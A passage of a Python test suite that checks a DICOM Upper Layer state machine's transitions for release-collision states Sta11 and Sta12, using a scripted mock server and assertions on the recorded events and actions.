# Evt10: Receive P-DATA-TF PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('recv', None),
('send', a_associate_ac),
('recv', None),
('send', a_release_rq),
('recv', None),
('send', p_data_tf),
('recv', None),
('wait', 0.1),
]
scp = self.start_server(commands)
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
self.assoc.acse.is_release_requested = is_release_requested
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
self.assoc.dul.send_pdu(self.get_release(True))
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:7] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta9', 'Evt14', 'AR-9'),
('Sta11', 'Evt10', 'AA-8'),
]
assert self.fsm._transitions[:6] == [
'Sta4', 'Sta5', 'Sta6', 'Sta7', 'Sta9', "Sta11"
]
assert self.fsm._events[:7] == [
'Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt12', 'Evt14', 'Evt10',
]
def test_evt11(self):
"""Test Sta11 + Evt11."""
# Sta11 + Evt11 -> <ignore> -> Sta11
# Evt11: Receive A-RELEASE (rq) primitive from <local user>
commands = [
('recv', None),
('send', a_associate_ac),
('recv', None),
('send', a_release_rq),
('recv', None),
('wait', 0.2),
]
scp = self.start_server(commands)
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
self.assoc.acse.is_release_requested = is_release_requested
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
self.assoc.dul.send_pdu(self.get_release(True))
time.sleep(0.1)
self.assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:6] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta9', 'Evt14', 'AR-9'),
]
assert self.fsm._transitions[:6] == [
'Sta4', 'Sta5', 'Sta6', 'Sta7', 'Sta9', "Sta11"
]
assert self.fsm._events[:7] == [
'Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt12', 'Evt14', 'Evt11'
]
def test_evt12(self):
"""Test Sta11 + Evt12."""
# Sta11 + Evt12 -> AA-8 -> Sta13
# Evt12: Receive A-RELEASE-RQ PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('recv', None),
('send', a_associate_ac),
('recv', None),
('send', a_release_rq),
('recv', None),
('send', a_release_rq),
('recv', None),
('wait', 0.1),
]
scp = self.start_server(commands)
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
self.assoc.acse.is_release_requested = is_release_requested
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
self.assoc.dul.send_pdu(self.get_release(True))
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:7] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta9', 'Evt14', 'AR-9'),
('Sta11', 'Evt12', 'AA-8'),
]
assert self.fsm._transitions[:6] == [
'Sta4', 'Sta5', 'Sta6', 'Sta7', 'Sta9', "Sta11"
]
assert self.fsm._events[:7] == [
'Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt12', 'Evt14', 'Evt12',
]
def test_evt13(self):
"""Test Sta11 + Evt13."""
# Sta11 + Evt13 -> AR-3 -> Sta1
# Evt13: Receive A-RELEASE-RP PDU from <remote>
# AR-3: Issue A-RELEASE (rp) primitive and close connection
commands = [
('recv', None),
('send', a_associate_ac),
('recv', None),
('send', a_release_rq),
('recv', None),
('send', a_release_rp),
('wait', 0.2),
]
scp = self.start_server(commands)
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
self.assoc.acse.is_release_requested = is_release_requested
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
self.assoc.dul.send_pdu(self.get_release(True))
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:7] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta9', 'Evt14', 'AR-9'),
('Sta11', 'Evt13', 'AR-3'),
]
assert self.fsm._transitions[:6] == [
'Sta4', 'Sta5', 'Sta6', 'Sta7', 'Sta9', "Sta11"
]
assert self.fsm._events[:7] == [
'Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt12', 'Evt14', 'Evt13',
]
def test_evt14(self):
"""Test Sta11 + Evt14."""
# Sta11 + Evt14 -> <ignore> -> Sta11
# Evt14: Receive A-RELEASE (rsp) primitive from <local user>
commands = [
('recv', None),
('send', a_associate_ac),
('recv', None),
('send', a_release_rq),
('recv', None),
('wait', 0.2),
]
scp = self.start_server(commands)
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
self.assoc.acse.is_release_requested = is_release_requested
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
self.assoc.dul.send_pdu(self.get_release(True))
time.sleep(0.1)
self.assoc.dul.send_pdu(self.get_release(True))
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:6] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta9', 'Evt14', 'AR-9'),
]
assert self.fsm._transitions[:6] == [
'Sta4', 'Sta5', 'Sta6', 'Sta7', 'Sta9', "Sta11"
]
assert self.fsm._events[:7] == [
'Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt12', 'Evt14', 'Evt14'
]
def test_evt15(self):
"""Test Sta11 + Evt15."""
# Sta11 + Evt15 -> AA-1 -> Sta13
# Evt15: Receive A-ABORT (rq) primitive from <local user>
# AA-1: Send A-ABORT PDU to <remote>, start ARTIM
commands = [
('recv', None), # recv a-associate-rq
('send', a_associate_ac),
('recv', None), # recv a-release-rq
('send', a_release_rq), # collide
('recv', None), # recv a-release-rp
('recv', None), # recv a-abort
('wait', 0.2),
]
scp = self.start_server(commands)
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
self.assoc.acse.is_release_requested = is_release_requested
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_release(True))
time.sleep(0.1)
self.assoc.dul.send_pdu(self.get_abort())
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:6] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta9', 'Evt14', 'AR-9'),
]
assert self.fsm._transitions[:6] == [
'Sta4', 'Sta5', 'Sta6', 'Sta7', 'Sta9', "Sta11"
]
assert self.fsm._events[:7] == [
'Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt12', 'Evt14', 'Evt15'
]
def test_evt16(self):
"""Test Sta11 + Evt16."""
# Sta11 + Evt16 -> AA-3 -> Sta1
# Evt16: Receive A-ABORT PDU from <remote>
# AA-3: Issue A-ABORT or A-P-ABORT primitive, close connection
commands = [
('recv', None),
('send', a_associate_ac),
('recv', None),
('send', a_release_rq),
('recv', None),
('send', a_abort),
('wait', 0.2),
]
scp = self.start_server(commands)
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
self.assoc.acse.is_release_requested = is_release_requested
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
self.assoc.dul.send_pdu(self.get_release(True))
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:7] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta9', 'Evt14', 'AR-9'),
('Sta11', 'Evt16', 'AA-3'),
]
assert self.fsm._transitions[:6] == [
'Sta4', 'Sta5', 'Sta6', 'Sta7', 'Sta9', "Sta11"
]
assert self.fsm._events[:7] == [
'Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt12', 'Evt14', 'Evt16',
]
def test_evt17(self):
"""Test Sta11 + Evt17."""
# Sta11 + Evt17 -> AA-4 -> Sta1
# Evt17: Receive TRANSPORT_CLOSED from <transport service>
# AA-4: Issue A-P-ABORT primitive
commands = [
('recv', None),
('send', a_associate_ac),
('recv', None),
('send', a_release_rq),
('recv', None),
]
scp = self.start_server(commands)
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
self.assoc.acse.is_release_requested = is_release_requested
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
self.assoc.dul.send_pdu(self.get_release(True))
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:7] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta9', 'Evt14', 'AR-9'),
('Sta11', 'Evt17', 'AA-4'),
]
assert self.fsm._transitions[:6] == [
'Sta4', 'Sta5', 'Sta6', 'Sta7', 'Sta9', "Sta11"
]
assert self.fsm._events[:7] == [
'Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt12', 'Evt14', 'Evt17',
]
def test_evt18(self):
"""Test Sta11 + Evt18."""
# Sta11 + Evt18 -> <ignore> -> Sta11
# Evt18: ARTIM timer expired from <local service>
commands = [
('recv', None),
('send', a_associate_ac),
('recv', None),
('send', a_release_rq),
('recv', None),
('wait', 0.2),
]
scp = self.start_server(commands)
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
self.assoc.acse.is_release_requested = is_release_requested
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
self.assoc.dul.send_pdu(self.get_release(True))
time.sleep(0.1)
self.assoc.dul.artim_timer.timeout = 0.05
self.assoc.dul.artim_timer.start()
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:6] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta9', 'Evt14', 'AR-9'),
]
assert self.fsm._transitions[:5] == [
'Sta4', 'Sta5', 'Sta6', 'Sta7', 'Sta9'
]
assert self.fsm._events[:7] == [
'Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt12', 'Evt14', 'Evt18',
]
def test_evt19(self):
"""Test Sta11 + Evt19."""
# Sta11 + Evt19 -> AA-8 -> Sta13
# Evt19: Received unrecognised or invalid PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('recv', None),
('send', a_associate_ac),
('recv', None),
('send', a_release_rq),
('recv', None),
('send', b'\x08\x00\x00\x00\x00\x00'),
('recv', None),
('wait', 0.1),
]
scp = self.start_server(commands)
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
self.assoc.acse.is_release_requested = is_release_requested
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
self.assoc.dul.send_pdu(self.get_release(True))
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:7] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta9', 'Evt14', 'AR-9'),
('Sta11', 'Evt19', 'AA-8'),
]
assert self.fsm._transitions[:6] == [
'Sta4', 'Sta5', 'Sta6', 'Sta7', 'Sta9', "Sta11"
]
assert self.fsm._events[:7] == [
'Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt12', 'Evt14', 'Evt19',
]
class TestState12(TestStateBase):
"""Tests for State 12: Release collision acc - awaiting A-RELEASE (rp)"""
def test_evt01(self):
"""Test Sta12 + Evt1."""
# Sta12 + Evt1 -> <ignore> -> Sta12
# Evt1: A-ASSOCIATE (rq) primitive from <local user>
commands = [
('send', a_associate_rq),
('recv', None), # recv a-associate-rq
('recv', None), # recv a-release-rq
('send', a_release_rq), # collide
('send', a_release_rp),
('wait', 0.1),
]
scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
assoc.acse.is_release_requested = is_release_requested
assoc.start()
while not assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
assoc.dul.send_pdu(self.get_associate('request'))
time.sleep(0.1)
#self.print_fsm_scp(fsm, scp)
scp.shutdown()
assert fsm._transitions[:6] == [
'Sta2', 'Sta3', 'Sta6', 'Sta7', 'Sta10', 'Sta12'
]
assert fsm._changes[:6] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
('Sta3', 'Evt7', 'AE-7'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta10', 'Evt13', 'AR-10'),
]
assert fsm._events[:7] == [
'Evt5', 'Evt6', 'Evt7', 'Evt11', 'Evt12', 'Evt13', 'Evt1'
]
@pytest.mark.skip()
def test_evt02(self):
"""Test Sta12 + Evt2."""
# Sta12 + Evt2 -> <ignore> -> Sta12
# Evt2: Receive TRANSPORT_OPEN from <transport service>
pass
def test_evt03(self):
"""Test Sta12 + Evt3."""
# Sta12 + Evt3 -> AA-8 -> Sta13
# Evt3: Receive A-ASSOCIATE-AC PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('send', a_associate_rq),
('recv', None), # recv a-associate-rq
('recv', None), # recv a-release-rq
('send', a_release_rq), # collide
('send', a_release_rp),
('send', a_associate_ac), # trigger event
('recv', None) # recv a-abort
]
scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
assoc.acse.is_release_requested = is_release_requested
assoc.start()
while not assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
#self.print_fsm_scp(fsm, scp)
scp.shutdown()
assert fsm._transitions[:6] == [
'Sta2', 'Sta3', 'Sta6', 'Sta7', 'Sta10', 'Sta12'
]
assert fsm._changes[:7] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
('Sta3', 'Evt7', 'AE-7'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta10', 'Evt13', 'AR-10'),
('Sta12', 'Evt3', 'AA-8'),
]
assert fsm._events[:7] == [
'Evt5', 'Evt6', 'Evt7', 'Evt11', 'Evt12', 'Evt13', 'Evt3'
]
assert scp.handlers[0].received[2] == (
b'\x07\x00\x00\x00\x00\x04\x00\x00\x02\x00'
)
def test_evt04(self):
"""Test Sta12 + Evt4."""
# Sta12 + Evt4 -> AA-8 -> Sta13
# Evt4: Receive A-ASSOCIATE-RJ PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('send', a_associate_rq),
('recv', None), # recv a-associate-rq
('recv', None), # recv a-release-rq
('send', a_release_rq), # collide
('send', a_release_rp),
('send', a_associate_rj), # trigger event
('recv', None) # recv a-abort
]
scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
assoc.acse.is_release_requested = is_release_requested
assoc.start()
while not assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
#self.print_fsm_scp(fsm, scp)
scp.shutdown()
assert fsm._transitions[:6] == [
'Sta2', 'Sta3', 'Sta6', 'Sta7', 'Sta10', 'Sta12'
]
assert fsm._changes[:7] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
('Sta3', 'Evt7', 'AE-7'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta10', 'Evt13', 'AR-10'),
('Sta12', 'Evt4', 'AA-8'),
]
assert fsm._events[:7] == [
'Evt5', 'Evt6', 'Evt7', 'Evt11', 'Evt12', 'Evt13', 'Evt4'
]
assert scp.handlers[0].received[2] == (
b'\x07\x00\x00\x00\x00\x04\x00\x00\x02\x00'
)
@pytest.mark.skip()
def test_evt05(self):
"""Test Sta12 + Evt5."""
# Sta12 + Evt5 -> <ignore> -> Sta12
# Evt5: Receive TRANSPORT_INDICATION from <transport service>
pass
def test_evt06(self):
"""Test Sta12 + Evt6."""
# Sta12 + Evt6 -> AA-8 -> Sta13
# Evt6: Receive A-ASSOCIATE-RQ PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('send', a_associate_rq),
('recv', None), # recv a-associate-rq
('recv', None), # recv a-release-rq
('send', a_release_rq), # collide
('send', a_release_rp),
('send', a_associate_rq), # trigger event
('recv', None) # recv a-abort
]
scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
assoc.acse.is_release_requested = is_release_requested
assoc.start()
while not assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
#self.print_fsm_scp(fsm, scp)
scp.shutdown()
assert fsm._transitions[:6] == [
'Sta2', 'Sta3', 'Sta6', 'Sta7', 'Sta10', 'Sta12'
]
assert fsm._changes[:7] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
('Sta3', 'Evt7', 'AE-7'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta10', 'Evt13', 'AR-10'),
('Sta12', 'Evt6', 'AA-8'),
]
assert fsm._events[:7] == [
'Evt5', 'Evt6', 'Evt7', 'Evt11', 'Evt12', 'Evt13', 'Evt6'
]
assert scp.handlers[0].received[2] == (
b'\x07\x00\x00\x00\x00\x04\x00\x00\x02\x00'
)
def test_evt07(self):
"""Test Sta12 + Evt7."""
# Sta12 + Evt7 -> <ignore> -> Sta12
# Evt7: Receive A-ASSOCIATE (accept) primitive from <local user>
commands = [
('send', a_associate_rq),
('recv', None), # recv a-associate-ac
('recv', None), # recv a-release-rq
('send', a_release_rq), # collide
('send', a_release_rp),
('wait', 0.1),
]
scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
assoc.acse.is_release_requested = is_release_requested
assoc.start()
while not assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
assoc.dul.send_pdu(self.get_associate('accept'))
time.sleep(0.1)
#self.print_fsm_scp(fsm, scp)
scp.shutdown()
assert fsm._transitions[:6] == [
'Sta2', 'Sta3', 'Sta6', 'Sta7', 'Sta10', 'Sta12'
]
assert fsm._changes[:6] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
('Sta3', 'Evt7', 'AE-7'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta10', 'Evt13', 'AR-10'),
]
assert fsm._events[:7] == [
'Evt5', 'Evt6', 'Evt7', 'Evt11', 'Evt12', 'Evt13', 'Evt7'
]
def test_evt08(self):
"""Test Sta12 + Evt8."""
# Sta12 + Evt8 -> <ignore> -> Sta12
# Evt8: Receive A-ASSOCIATE (reject) primitive from <local user>
commands = [
('send', a_associate_rq),
('recv', None), # recv a-associate-rq
('recv', None), # recv a-release-rq
('send', a_release_rq), # collide
('send', a_release_rp),
('wait', 0.1),
]
scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
assoc.acse.is_release_requested = is_release_requested
assoc.start()
while not assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
assoc.dul.send_pdu(self.get_associate('reject'))
time.sleep(0.1)
#self.print_fsm_scp(fsm, scp)
scp.shutdown()
assert fsm._transitions[:6] == [
'Sta2', 'Sta3', 'Sta6', 'Sta7', 'Sta10', 'Sta12'
]
assert fsm._changes[:6] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
('Sta3', 'Evt7', 'AE-7'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta10', 'Evt13', 'AR-10'),
]
assert fsm._events[:7] == [
'Evt5', 'Evt6', 'Evt7', 'Evt11', 'Evt12', 'Evt13', 'Evt8'
]
def test_evt09(self):
"""Test Sta12 + Evt9."""
# Sta12 + Evt9 -> <ignore> -> Sta12
# Evt9: Receive P-DATA primitive from <local user>
commands = [
('send', a_associate_rq),
('recv', None), # recv a-associate-rq
('recv', None), # recv a-release-rq
('send', a_release_rq), # collide
('send', a_release_rp),
('wait', 0.1),
]
scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
assoc.acse.is_release_requested = is_release_requested
assoc.start()
while not assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
assoc.dul.send_pdu(self.get_pdata())
time.sleep(0.1)
#self.print_fsm_scp(fsm, scp)
scp.shutdown()
assert fsm._transitions[:6] == [
'Sta2', 'Sta3', 'Sta6', 'Sta7', 'Sta10', 'Sta12'
]
assert fsm._changes[:6] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
('Sta3', 'Evt7', 'AE-7'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta10', 'Evt13', 'AR-10'),
]
assert fsm._events[:7] == [
'Evt5', 'Evt6', 'Evt7', 'Evt11', 'Evt12', 'Evt13', 'Evt9'
]
def test_evt10(self):
"""Test Sta12 + Evt10."""
# Sta12 + Evt10 -> AA-8 -> Sta13
# Evt10: Receive P-DATA-TF PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('send', a_associate_rq),
('recv', None), # recv a-associate-rq
('recv', None), # recv a-release-rq
('send', a_release_rq), # collide
('send', a_release_rp),
('send', p_data_tf), # trigger event
('recv', None) # recv a-abort
]
scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
assoc.acse.is_release_requested = is_release_requested
assoc.start()
while not assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
#self.print_fsm_scp(fsm, scp)
scp.shutdown()
assert fsm._transitions[:6] == [
'Sta2', 'Sta3', 'Sta6', 'Sta7', 'Sta10', 'Sta12'
]
assert fsm._changes[:7] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
('Sta3', 'Evt7', 'AE-7'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta10', 'Evt13', 'AR-10'),
('Sta12', 'Evt10', 'AA-8'),
]
assert fsm._events[:7] == [
'Evt5', 'Evt6', 'Evt7', 'Evt11', 'Evt12', 'Evt13', 'Evt10'
]
assert scp.handlers[0].received[2] == (
b'\x07\x00\x00\x00\x00\x04\x00\x00\x02\x00'
)
def test_evt11(self):
"""Test Sta12 + Evt11."""
# Sta12 + Evt11 -> <ignore> -> Sta12
# Evt11: Receive A-RELEASE (rq) primitive from <local user>
commands = [
('send', a_associate_rq),
('recv', None), # recv a-associate-rq
('recv', None), # recv a-release-rq
('send', a_release_rq), # collide
('send', a_release_rp),
('wait', 0.1),
]
scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
assoc.acse.is_release_requested = is_release_requested
assoc.start()
while not assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
#self.print_fsm_scp(fsm, scp)
scp.shutdown()
assert fsm._transitions[:6] == [
'Sta2', 'Sta3', 'Sta6', 'Sta7', 'Sta10', 'Sta12'
]
assert fsm._changes[:6] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
('Sta3', 'Evt7', 'AE-7'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta10', 'Evt13', 'AR-10'),
]
assert fsm._events[:7] == [
'Evt5', 'Evt6', 'Evt7', 'Evt11', 'Evt12', 'Evt13', 'Evt11'
]
def test_evt12(self):
"""Test Sta12 + Evt12."""
# Sta12 + Evt12 -> AA-8 -> Sta13
# Evt12: Receive A-RELEASE-RQ PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('send', a_associate_rq),
('recv', None), # recv a-associate-rq
('recv', None), # recv a-release-rq
('send', a_release_rq), # collide
('send', a_release_rp),
('send', a_release_rq), # trigger event
('recv', None) # recv a-abort
]
scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
assoc.acse.is_release_requested = is_release_requested
assoc.start()
while not assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
#self.print_fsm_scp(fsm, scp)
scp.shutdown()
assert fsm._transitions[:6] == [
'Sta2', 'Sta3', 'Sta6', 'Sta7', 'Sta10', 'Sta12'
]
assert fsm._changes[:7] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
('Sta3', 'Evt7', 'AE-7'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta10', 'Evt13', 'AR-10'),
('Sta12', 'Evt12', 'AA-8'),
]
assert fsm._events[:7] == [
'Evt5', 'Evt6', 'Evt7', 'Evt11', 'Evt12', 'Evt13', 'Evt12'
]
assert scp.handlers[0].received[2] == (
b'\x07\x00\x00\x00\x00\x04\x00\x00\x02\x00'
)
def test_evt13(self):
"""Test Sta12 + Evt13."""
# Sta12 + Evt13 -> AA-8 -> Sta1
# Evt13: Receive A-RELEASE-RP PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('send', a_associate_rq),
('recv', None), # recv a-associate-rq
('recv', None), # recv a-release-rq
('send', a_release_rq), # collide
('send', a_release_rp),
('send', a_release_rp), # trigger event
('recv', None) # recv a-abort
]
scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
assoc.acse.is_release_requested = is_release_requested
assoc.start()
while not assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
#self.print_fsm_scp(fsm, scp)
scp.shutdown()
assert fsm._transitions[:6] == [
'Sta2', 'Sta3', 'Sta6', 'Sta7', 'Sta10', 'Sta12'
]
assert fsm._changes[:7] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
('Sta3', 'Evt7', 'AE-7'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta10', 'Evt13', 'AR-10'),
('Sta12', 'Evt13', 'AA-8'),
]
assert fsm._events[:7] == [
